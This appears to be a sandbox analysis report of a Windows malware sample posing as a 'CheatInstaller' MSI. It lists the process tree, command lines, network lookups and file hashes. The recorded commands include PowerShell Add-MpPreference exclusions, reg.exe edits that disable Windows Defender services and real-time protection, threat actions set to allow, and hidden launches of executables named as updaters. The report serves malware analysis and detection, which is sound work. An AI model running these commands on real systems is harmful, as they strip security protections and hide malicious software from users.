PID 2920 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe
PID 2920 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe
PID 2160 wrote to memory of 1012 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 1012 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 1012 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2256 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2256 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2160 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2124 wrote to memory of 4920 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2124 wrote to memory of 4920 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4920 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2160 wrote to memory of 3896 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 3896 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2160 wrote to memory of 3896 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 3184 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4552 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1640 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 22FEEC0CB1B9208DCFF0696836FB1B39 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710551135 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 23AEA7AEC4B6D54B182FDB5E31F1E4E3

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss74D5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi74D2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr74D3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr74D4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 597538C2EFAB546524526775FEDC510E E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSID778.tmp

"C:\Windows\Installer\MSID778.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD78C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiD779.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrD77A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrD77B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D84F.tmp\D850.tmp\D851.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 372 -ip 372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 2120

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 372 -ip 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 2120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\Installer\MSIE805.tmp

"C:\Windows\Installer\MSIE805.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSIE806.tmp

"C:\Windows\Installer\MSIE806.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSIE807.tmp

"C:\Windows\Installer\MSIE807.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

Network

Country Destination Domain Proto
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 56.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
